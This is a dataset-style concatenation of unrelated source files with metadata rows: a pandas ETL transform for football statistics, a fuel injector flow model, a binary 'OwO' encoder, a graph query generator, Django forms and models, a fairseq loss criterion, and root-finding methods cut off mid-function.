if 'country' in data_frame.columns:
lambdafunc = lambda x: pd.Series(self.get_id(mco.Countries, name=x['country']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['country_id']
else:
raise KeyError("Cannot insert Club record: No Country data present")
return data_frame.join(id_frame)
def venues(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mco.Countries, name=x['country']),
self.get_id(mco.Timezones, name=x['timezone']),
self.get_id(mco.Surfaces, description=x['surface']),
self.make_date_object(x['config_date'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['country_id', 'timezone_id', 'surface_id', 'eff_date']
joined_frame = data_frame.join(ids_frame).drop(['country', 'timezone', 'surface', 'config_date'], axis=1)
new_frame = joined_frame.where((pd.notnull(joined_frame)), None)
return new_frame
def timezones(self, data_frame):
lambdafunc = lambda x: pd.Series(enums.ConfederationType.from_string(x['confed']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['confederation']
joined_frame = data_frame.join(id_frame).drop('confed', axis=1)
return joined_frame
def positions(self, data_frame):
lambdafunc = lambda x: pd.Series(enums.PositionType.from_string(x['position_type']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['type']
joined_frame = data_frame.join(id_frame).drop('position_type', axis=1)
return joined_frame
def surfaces(self, data_frame):
lambdafunc = lambda x: pd.Series(enums.SurfaceType.from_string(x['surface_type']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['type']
joined_frame = data_frame.join(id_frame).drop('surface_type', axis=1)
return joined_frame
def players(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.make_date_object(x['dob']),
enums.NameOrderType.from_string(x['name_order'] or 'Western'),
self.get_id(mco.Countries, name=x['country']),
self.get_id(mcs.PositionMap, remote_id=x['remote_position_id'], supplier_id=self.supplier_id)
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['birth_date', 'order', 'country_id', 'position_id']
joined_frame = data_frame.join(ids_frame).drop(
['dob', 'name_order', 'country', 'remote_position_id'], axis=1)
return joined_frame
def managers(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.make_date_object(x['dob']),
enums.NameOrderType.from_string(x['name_order'] or 'Western'),
self.get_id(mco.Countries, name=x['country'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['birth_date', 'order', 'country_id']
joined_frame = data_frame.join(ids_frame).drop(['dob', 'name_order', 'country'], axis=1)
return joined_frame
def referees(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.make_date_object(x['dob']),
enums.NameOrderType.from_string(x['name_order'] or 'Western'),
self.get_id(mco.Countries, name=x['country'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['birth_date', 'order', 'country_id']
joined_frame = data_frame.join(ids_frame).drop(['dob', 'name_order', 'country'], axis=1)
return joined_frame
def league_matches(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mco.Competitions, name=x['competition']),
self.get_id(mco.Seasons, name=x['season']),
self.get_id(mco.Venues, name=x['venue']),
self.get_id(mc.Clubs, name=x['home_team']),
self.get_id(mc.Clubs, name=x['away_team']),
self.get_id(mcp.Managers, full_name=x['home_manager']),
self.get_id(mcp.Managers, full_name=x['away_manager']),
self.get_id(mcp.Referees, full_name=x['referee']),
self.make_date_object(x['date']),
enums.WeatherConditionType.from_string(x['kickoff_wx']) if x['kickoff_wx'] else None,
enums.WeatherConditionType.from_string(x['halftime_wx']) if x['halftime_wx'] else None,
enums.WeatherConditionType.from_string(x['fulltime_wx']) if x['fulltime_wx'] else None
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['competition_id', 'season_id', 'venue_id', 'home_team_id', 'away_team_id',
'home_manager_id', 'away_manager_id', 'referee_id', 'match_date',
'kickoff_weather', 'halftime_weather', 'fulltime_weather']
columns_to_drop = ['competition', 'season', 'venue', 'home_team', 'away_team', 'home_manager',
'away_manager', 'referee', 'date', 'kickoff_wx', 'halftime_wx', 'fulltime_wx']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def knockout_matches(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mco.Competitions, name=x['competition']),
self.get_id(mco.Seasons, name=x['season']),
self.get_id(mco.Venues, name=x['venue']),
self.get_id(mc.Clubs, name=x['home_team']),
self.get_id(mc.Clubs, name=x['away_team']),
self.get_id(mcp.Managers, full_name=x['home_manager']),
self.get_id(mcp.Managers, full_name=x['away_manager']),
self.get_id(mcp.Referees, full_name=x['referee']),
enums.KnockoutRoundType.from_string(x['round']),
self.make_date_object(x['date']),
enums.WeatherConditionType.from_string(x['kickoff_wx']) if x['kickoff_wx'] else None,
enums.WeatherConditionType.from_string(x['halftime_wx']) if x['halftime_wx'] else None,
enums.WeatherConditionType.from_string(x['fulltime_wx']) if x['fulltime_wx'] else None
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['competition_id', 'season_id', 'venue_id', 'home_team_id', 'away_team_id',
'home_manager_id', 'away_manager_id', 'referee_id', 'ko_round', 'match_date',
'kickoff_weather', 'halftime_weather', 'fulltime_weather']
columns_to_drop = ['competition', 'season', 'venue', 'home_team', 'away_team', 'home_manager',
'away_manager', 'referee', 'date', 'round', 'kickoff_wx', 'halftime_wx', 'fulltime_wx']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def group_matches(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mco.Competitions, name=x['competition']),
self.get_id(mco.Seasons, name=x['season']),
self.get_id(mco.Venues, name=x['venue']),
self.get_id(mc.Clubs, name=x['home_team']),
self.get_id(mc.Clubs, name=x['away_team']),
self.get_id(mcp.Managers, full_name=x['home_manager']),
self.get_id(mcp.Managers, full_name=x['away_manager']),
self.get_id(mcp.Referees, full_name=x['referee']),
enums.GroupRoundType.from_string(x['round']),
self.make_date_object(x['date']),
enums.WeatherConditionType.from_string(x['kickoff_wx']) if x['kickoff_wx'] else None,
enums.WeatherConditionType.from_string(x['halftime_wx']) if x['halftime_wx'] else None,
enums.WeatherConditionType.from_string(x['fulltime_wx']) if x['fulltime_wx'] else None
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['competition_id', 'season_id', 'venue_id', 'home_team_id', 'away_team_id',
'home_manager_id', 'away_manager_id', 'referee_id', 'group_round', 'match_date',
'kickoff_weather', 'halftime_weather', 'fulltime_weather']
columns_to_drop = ['competition', 'season', 'venue', 'home_team', 'away_team', 'home_manager',
'away_manager', 'referee', 'date', 'round', 'kickoff_wx', 'halftime_wx', 'fulltime_wx']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def match_lineups(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubLeagueMatches,
competition_id=self.get_id(mco.Competitions, name=x['competition']),
season_id=self.get_id(mco.Seasons, name=x['season']),
matchday=x['matchday'],
home_team_id=self.get_id(mc.Clubs, name=x['home_team']),
away_team_id=self.get_id(mc.Clubs, name=x['away_team'])),
self.get_id(mc.Clubs, name=x['player_team']),
self.get_id(mcp.Players, full_name=x['player_name'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['match_id', 'team_id', 'player_id']
columns_to_drop = ['competition', 'season', 'matchday', 'home_team', 'away_team']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def goals(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['scorer'])),
self.get_id(mc.Clubs, name=x['scoring_team']),
enums.ShotEventType.from_string(x['scoring_event']),
enums.BodypartType.from_string(x['bodypart_desc'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_id', 'team_id', 'event', 'bodypart']
columns_to_drop = ['remote_match_id', 'scorer', 'scoring_team', 'scoring_event', 'bodypart_desc']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def penalties(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['penalty_taker'])),
enums.FoulEventType.from_string(x['penalty_foul']),
enums.ShotOutcomeType.from_string(x['penalty_outcome'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_id', 'foul', 'outcome']
columns_to_drop = ['remote_match_id', 'penalty_taker', 'penalty_foul', 'penalty_outcome']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def bookables(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['player'])),
enums.FoulEventType.from_string(x['foul_desc']),
enums.CardType.from_string(x['card_type'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_id', 'foul', 'card']
columns_to_drop = ['remote_match_id', 'player', 'foul_desc', 'card_type']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def substitutions(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['in_player_name'])),
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'],
supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['out_player_name']))
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_in_id', 'lineup_out_id']
columns_to_drop = ['remote_match_id', 'in_player_name', 'out_player_name']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
def penalty_shootouts(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(mcs.MatchMap, remote_id=x['remote_match_id'], supplier_id=self.supplier_id),
player_id=self.get_id(mcp.Players, full_name=x['penalty_taker'])),
enums.ShotOutcomeType.from_string(x['penalty_outcome'])
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['lineup_id', 'outcome']
columns_to_drop = ['remote_match_id', 'penalty_taker', 'penalty_outcome']
return data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
class MarcottiStatsTransform(MarcottiTransform):
categories = ['assists', 'clearances', 'corner_crosses', 'corners', 'crosses', 'defensives',
'discipline', 'duels', 'foul_wins', 'freekicks', 'gk_actions', 'gk_allowed_goals',
'gk_allowed_shots', 'gk_saves', 'goal_bodyparts', 'goal_locations', 'goal_totals',
'goalline_clearances', 'important_plays', 'pass_directions', 'pass_lengths',
'pass_locations', 'pass_totals', 'penalty_actions', 'shot_blocks', 'shot_bodyparts',
'shot_locations', 'shot_plays', 'shot_totals', 'tackles', 'throwins', 'touch_locations',
'touches']
def __init__(self, session, supplier):
super(MarcottiStatsTransform, self).__init__(session, supplier)
for category in MarcottiStatsTransform.categories:
add_stats_fn(category)
def add_stats_fn(category):
def fn(self, data_frame):
lambdafunc = lambda x: pd.Series([
self.get_id(mcs.PlayerMap, remote_id=x['remote_player_id'], supplier_id=self.supplier_id),
self.get_id(mc.ClubMap, remote_id=x['remote_player_team_id'], supplier_id=self.supplier_id),
self.get_id(mc.ClubMap, remote_id=x['remote_opposing_team_id'], supplier_id=self.supplier_id)
])
ids_frame = data_frame.apply(lambdafunc, axis=1)
ids_frame.columns = ['player_id', 'player_team_id', 'opposing_team_id']
columns_to_drop = ['remote_player_id', 'remote_player_team_id', 'remote_opposing_team_id']
inter_frame = data_frame.join(ids_frame).drop(columns_to_drop, axis=1)
outerlambdafunc = lambda x: pd.Series([
self.get_id(mc.ClubMatchLineups,
match_id=self.get_id(
mc.ClubLeagueMatches,
home_team_id=x['player_team_id'] if x['locale'] == 'Home' else x['opposing_team_id'],
away_team_id=x['opposing_team_id'] if x['locale'] == 'Away' else x['player_team_id'],
date=x['match_date']),
player_id=x['player_id'])
])
outerids_frame = inter_frame.apply(outerlambdafunc, axis=1)
outerids_frame.columns = ['lineup_id']
more_columns_to_drop = ['player_team_id', 'opposing_team_id', 'match_date', 'locale', 'player_id']
return inter_frame.join(outerids_frame).drop(more_columns_to_drop, axis=1)
setattr(MarcottiStatsTransform, category, fn)
fn.__name__ = category
fn.__doc__ = "Data transformation for {} method".format(category)
| 54.349398
| 121
| 0.627854
| 16,036
| 0.888716
| 0
| 0
| 204
| 0.011306
| 0
| 0
| 4,060
| 0.225006
|
afb151ddaf6fe45b7776879d93b6a4036ec2ff77
| 2,863
|
py
|
Python
|
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
import copy
import numpy as np
from compressible_tools import *
class FuelInjector:
"""A fuel injector.
Parameters
----------
fuel : Species
The fluid being fed through the injector.
T : float
Inlet temperature of injector.
A : float
Cross-sectional area.
"""
def __init__(self, fuel, T, A):
# Store
self.fuel = fuel
self.T = T
self.A = A
def calc_subcritical_injector_pressure(self, m_dot, p_ext):
"""Calculates the required pressure in the injector to supply the given massflow against the given exterior pressure. Assumes the injector is subsonic but compressible.
Parameters
----------
m_dot : float
Required massflow.
p_ext : float
Exterior pressure.
Returns
-------
p_inj : float
Required injector pressure.
"""
# Define function to find the root of
def f(p_inj):
return self.subcritical_massflow(p_inj, p_ext)-m_dot
# Find root using secant method
p0 = p_ext*1.1
p1 = p_ext*1.2
f0 = f(p0)
f1 = f(p1)
while abs(f1/m_dot)>1e-12:
# Get new pressure guess
p2 = p1-f1*(p0-p1)/(f0-f1)
# Update for next iteration
p0 = p1
p1 = p2
f0 = f1
f1 = f(p1)
# Check the result is subcritical
p_crit = (0.5*(self.fuel.gamma+1.0))**(self.fuel.gamma/(self.fuel.gamma-1.0))*p_ext
if p1 >= p_crit:
raise RuntimeError("Subcritical assumption of injector violated. Critical pressure is {0:1.6e}".format(p_crit))
return p1, p_crit
def subcritical_massflow(self, p_inj, p_ext):
"""Gives the massflow through the injector based on the injector pressure assuming the flow is subcritical.
Parameters
----------
p_inj : float
Injector pressure.
Returns
-------
m_dot : float
Massflow.
"""
a = (p_ext/p_inj)**(2.0/self.fuel.gamma)-(p_ext/p_inj)**((self.fuel.gamma+1.0)/self.fuel.gamma)
b = p_inj**2/(self.fuel.R_g*self.T)*a
c = 2.0*self.fuel.gamma/(self.fuel.gamma-1.0)*b
return self.A*np.sqrt(c)
def calc_velocity(self, p_inj, p_ext):
"""Gives the velocity through the injector based on the injector pressure assuming the flow is subcritical.
Parameters
----------
p_inj : float
Injector pressure.
Returns
-------
V : float
Velocity
"""
# Calculate massflow
m_dot = self.subcritical_massflow(p_inj, p_ext)
# Calculate density
rho = p_inj/(self.fuel.R_g*self.T)
return m_dot/(rho*self.A)
| 24.895652
| 176
| 0.550472
| 2,796
| 0.976598
| 0
| 0
| 0
| 0
| 0
| 0
| 1,500
| 0.523926
|
afb26810722dea2343152102b81238f0ece5d0c5
| 1,976
|
py
|
Python
|
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | 4
|
2020-08-10T06:01:35.000Z
|
2021-08-30T02:26:29.000Z
|
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | null | null | null |
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | 1
|
2021-06-02T09:16:43.000Z
|
2021-06-02T09:16:43.000Z
|
#!/usr/bin/env python3
# owoencode.py, a part of owoencoder
# Made by Glitch, 2020
# https://www.glitchfur.net
from sys import argv, stdout, stderr
from os.path import exists, split
from os import remove
KEEP_ORIG = False
STDOUT_FLAG = False
def main():
if len(argv) < 2:
print("The syntax for running this script is as follows:")
print("python owoencode.py [-kc] <original_file> [ ... ]")
exit(0)
in_fns = argv[1:]
# There is probably a better way to handle parameters. But considering
# there are only two, I'm not too worried about it right now.
for param in in_fns:
if param.startswith("-"):
global KEEP_ORIG
global STDOUT_FLAG
if "k" in param:
KEEP_ORIG = True
if "c" in param:
STDOUT_FLAG = True
KEEP_ORIG = True # Output going to stdout, keep original file
in_fns.remove(param)
for fn in in_fns:
if not exists(fn):
print("%s: No such file or directory" % fn, file=stderr)
exit(1)
if exists("%s.owo" % fn):
print("%s: Encoding would cause a naming conflict " \
"with an existing file, ignoring" % fn)
in_fns.remove(fn)
out_fns = ["%s.owo" % fn for fn in in_fns]
for i in range(len(in_fns)):
encode(in_fns[i], out_fns[i])
def encode(in_fn, out_fn):
in_fp = open(in_fn, "rb")
if STDOUT_FLAG == False:
out_fp = open(out_fn, "w")
else:
out_fp = stdout
while True:
in_buffer = in_fp.read(1048576) # read 1MB at a time
if not in_buffer:
break
out_buffer = ''.join([bin(byte)[2:].zfill(8) for byte in in_buffer])
out_fp.write(out_buffer.replace("1", "OwO").replace("0", "UwU"))
in_fp.close()
if STDOUT_FLAG == False:
out_fp.close()
if KEEP_ORIG == False:
remove(in_fn)
if __name__ == "__main__":
main()
| 30.875
| 77
| 0.577935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 573
| 0.28998
|
afb31209b87b0007cddea5b09c524bff1b45d36d
| 2,589
|
py
|
Python
|
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | 2
|
2018-10-09T09:59:45.000Z
|
2021-11-21T17:01:47.000Z
|
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | null | null | null |
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | null | null | null |
# Fix number of node predicates at 1 out of 6
# this ensures queries with larger space of possible nodes
# The number of colors in a query is varied from 1 to 5
import argparse
import numpy as np
from graph_gen import birth_years, genders, num_posts, num_friends
possibilities = [1, 3, 4, 5]
# do not consider equaliy as it will narrow down
# extreme node sets too much
op1 = ["<=", "<", ">", ">="]
op2 = ["==", "!="]
def construct_predicate():
# attribute 2 & 6 should never be considered
orig_query = ["__"] * 6
# num_preds = np.random.choice([0, 1, 2, 3])
num_preds = 3
selected_predicates = np.random.choice(possibilities, num_preds, replace=False)
for predicate in selected_predicates:
query = ""
if predicate == 1:
# birth_year
op_value = np.random.choice(birth_years)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
elif predicate == 3:
# sex
op_value = np.random.choice(genders)
op = np.random.choice(op2)
query += str(op)
query += str(op_value)
elif predicate == 4:
# posts
op_value = np.random.choice(num_posts)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
elif predicate == 5:
# friends
op_value = np.random.choice(num_friends)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
orig_query[predicate - 1] = query
return "".join(orig_query)
def construct_regex():
colors = ['a', 'b', 'c', 'd', 'e', 'f']
# some parameters to fix for queries
max_colors = 4
max_len = 8
ops = ["", "<="]
# reg_len = np.random.randint(1, max_colors + 1)
reg_len = 3
np.random.shuffle(colors)
regex = ""
for color in colors[:reg_len]:
regex += color
op = np.random.choice(ops)
if op != "<=":
regex += op
else:
regex += op
regex += str(np.random.randint(2, max_len + 1))
return regex
def construct_query():
pred1 = construct_predicate()
pred2 = construct_predicate()
regex = construct_regex()
return pred1 + " " + pred2 + " " + regex
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--Q", type=int, default=10)
args = parser.parse_args()
print(args.Q)
for i in range(args.Q):
print(construct_query())
if __name__ == "__main__":
main()
| 27.83871
| 83
| 0.565469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 520
| 0.20085
|
afb50c8aa67608ab3deea105ffee6debac103ea3
| 195
|
py
|
Python
|
multiplepagesproject/prodforms.py
|
mandeep-django/admin-panel
|
30c65730e74004ec21cf891627fbbaa027f626db
|
[
"MIT"
] | null | null | null |
multiplepagesproject/prodforms.py
|
mandeep-django/admin-panel
|
30c65730e74004ec21cf891627fbbaa027f626db
|
[
"MIT"
] | null | null | null |
multiplepagesproject/prodforms.py
|
mandeep-django/admin-panel
|
30c65730e74004ec21cf891627fbbaa027f626db
|
[
"MIT"
] | null | null | null |
from django import forms
from multiplepagesproject.prodmodels import proddisplay
class productforms(forms.ModelForm):
class Meta:
model = proddisplay
fields = "__all__"
| 27.857143
| 56
| 0.723077
| 110
| 0.564103
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.046154
|
afb5ce60435e8b3c83936754903becf1fcb4fbdf
| 1,292
|
py
|
Python
|
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | null | null | null |
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | 11
|
2020-03-24T15:29:46.000Z
|
2022-03-11T23:14:48.000Z
|
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | null | null | null |
import string
from django.template import Context
from django.template.loader import get_template
from django import template
register = template.Library()
import crm
@register.inclusion_tag('comments/form.html')
def render_cedar_comment_form(**kwargs):
object = kwargs.pop('object', None)
parent_id = kwargs.pop('parent_id', None) # id of parent comment
if object is None:
raise AssertionError("object kwarg cannot be None")
else:
return {
'object': object,
'parent_id': parent_id
}
#
# response = {
# 'element_id': kwargs.pop('element_id', None),
# 'data': data,
# 'related_object': related_object,
# 'include_toolbar': kwargs.pop('include_toolbar', True)
# }
return response
# @register.filter
# def render_related_communication_items(related_object):
# '''
# Called by the CommunicationViewset
# to render data if html is requested.
# :param related_object:
# :return: rendered communication items list (<ul>)
# '''
# comms_objects = Communication.get_communications_related_to(related_object)
# context = Context({'data': comms_objects})
# t = get_template("communication/communication_items.html")
# return t.render(context)
| 28.711111
| 81
| 0.670279
| 0
| 0
| 0
| 0
| 625
| 0.483746
| 0
| 0
| 777
| 0.601393
|
afb6bce0846f3ad5fdbe2619d6c7b2dd5348269a
| 3,504
|
py
|
Python
|
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import math
import torch
import torch.nn.functional as F
from fairseq import utils
from . import FairseqCriterion, register_criterion
@register_criterion('cross_entropy')
class CrossEntropyCriterion(FairseqCriterion):
def __init__(self, args, task):
super().__init__(args, task)
self.task = task
def forward(self, model, sample, reduce=True):
"""Compute the loss for the given sample.
Returns a tuple with three elements:
1) the loss
2) the sample size, which is used as the denominator for the gradient
3) logging outputs to display while training
"""
# import pdb
# pdb.set_trace()
net_output = model(**sample['net_input'])
lprobs = model.get_normalized_probs(net_output, log_probs=True)
lprobs = lprobs.view(-1, lprobs.size(-1))
target = model.get_targets(sample, net_output).view(-1)
loss = F.nll_loss(lprobs, target, size_average=False, ignore_index=self.padding_idx,
reduce=reduce)
sample_size = sample['target'].size(0) if self.args.sentence_avg else sample['ntokens']
logging_output = {
'loss': utils.item(loss.data) if reduce else loss.data,
'ntokens': sample['ntokens'],
'nsentences': sample['target'].size(0),
'sample_size': sample_size,
}
# 测试查看:运行时刻模型输出分布最大概率采样产生的目标语言序列
# tgt = sample['target']
# hypo = torch.max(lprobs,1)[1].reshape(*tgt.shape)
# print(tgt, hypo, sep="\n")
# tgt_str = self.task.tgt_dict.string(tgt, True, escape_unk=True)
# hypo_str = self.task.tgt_dict.string(hypo, True, escape_unk=True)
# pre_str = self.task.tgt_dict.string(sample['net_input']['prev_output_tokens'], True, escape_unk=True)
# for t,h,p in zip(tgt_str.split("\n"),hypo_str.split("\n"),pre_str.split("\n")):
# print(f"T: {t}")
# print(f"H: {h}")
# print(f"P: {p}")
# print("-"*20)
# from fairseq.sequence_generator import SequenceGenerator
# translator = SequenceGenerator(
# [model], self.task.target_dictionary, beam_size=5)
# print("-"*20, "by sequence generator", "-"*20)
# print(translator.generate_by_a_sample(sample))
# import pdb
# pdb.set_trace()
return loss, sample_size, logging_output
@staticmethod
def aggregate_logging_outputs(logging_outputs):
"""Aggregate logging outputs from data parallel training."""
loss_sum = sum(log.get('loss', 0) for log in logging_outputs)
ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)
nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)
sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)
agg_output = {
'loss': loss_sum / sample_size / math.log(2),
'ntokens': ntokens,
'nsentences': nsentences,
'sample_size': sample_size,
}
if sample_size != ntokens:
agg_output['nll_loss'] = loss_sum / ntokens / math.log(2)
return agg_output
| 37.276596
| 111
| 0.623002
| 3,102
| 0.87037
| 0
| 0
| 3,139
| 0.880752
| 0
| 0
| 1,676
| 0.470258
|
afb90e0689a3fd6f900cf89c2141c1e4deace929
| 365
|
py
|
Python
|
blog/models.py
|
adityabisoi/personal-portfolio
|
34e9f9dc1b78b12bf27f934ae71efa0058450c0d
|
[
"MIT"
] | 1
|
2020-02-19T09:45:28.000Z
|
2020-02-19T09:45:28.000Z
|
blog/models.py
|
adityabisoi/personal-portfolio
|
34e9f9dc1b78b12bf27f934ae71efa0058450c0d
|
[
"MIT"
] | 6
|
2021-03-19T04:39:19.000Z
|
2022-02-10T13:52:14.000Z
|
blog/models.py
|
adityabisoi/personal-portfolio
|
34e9f9dc1b78b12bf27f934ae71efa0058450c0d
|
[
"MIT"
] | null | null | null |
from django.db import models
class Blog(models.Model):
title = models.CharField(max_length=15)
date = models.DateField(auto_now_add=True)
body = models.TextField()
image = models.ImageField(upload_to='images/')
#To return title to admin page
def __str__(self):
return self.title
def limit(self):
return self.body[:100]
| 26.071429
| 50
| 0.679452
| 335
| 0.917808
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.106849
|
afbb87c6ab776c79d599ae4c17e47909e935b3eb
| 3,845
|
py
|
Python
|
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/University-ITMO
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | 3
|
2021-10-13T05:01:37.000Z
|
2022-01-21T15:25:47.000Z
|
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/university
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | null | null | null |
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/university
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | null | null | null |
from copy import copy
from modules.parse import parse
from modules.equation import grad, node_flatten
from modules.matrix import Matrix
from modules.util import ProjectException
from modules.util import Color, color_string
def split_half(data: dict) -> dict:
node_root = data["equation"][0]
var_list = data["var_list"]
if (len(var_list) != 1):
raise ProjectException(color_string(Color.RED, "ERROR >> Amount of variables should be equal to 1"))
try:
range_min = data["data"]["range_min"]
range_max = data["data"]["range_max"]
iterations = data["data"]["iterations"]
except KeyError:
raise ProjectException(color_string(Color.RED,
"Key not found!(should be present range_min, range_max, iterations)"))
fval_range_min = node_root.calculate({var_list[0]: range_min})
fval_range_max = node_root.calculate({var_list[0]: range_max})
if (sum([fval_range_min > 0, fval_range_max > 0]) != 1):
return {"error": "Invalid arguments. Function values of borders are same sigh"}
for _ in range(iterations):
range_med = (range_max + range_min) / 2
fval_range_med = node_root.calculate({var_list[0]: range_med})
if (sum([fval_range_med > 0, fval_range_min > 0]) == 1):
range_max = range_med
else:
range_min = range_med
return {"result": {"range_min": range_min, "range_max": range_max}}
def tangent(data: dict) -> dict:
node = data["equation"][0]
var_list = data["var_list"]
if (len(var_list) != 1):
raise ProjectException(color_string(Color.RED, "ERROR >> Amount of variables should be equal to 1"))
try:
x_0 = data["data"]["x_0"]
iterations = data["data"]["iterations"]
except KeyError:
raise ProjectException(color_string(Color.RED, "Key not found!(should be present x_0)"))
f = node.calculate({var_list[0]: x_0})
f_ll = grad(grad(node_flatten(node, {"x": x_0}, "x")))(x_0)
if (f * f_ll <= 0):
return {"error": "Invalid arguments. Derivative'' * func <= 0. Iteration process doesn't converge"}
x_prev = x_0
for _ in range(iterations):
f_x = node.calculate({var_list[0]: x_prev})
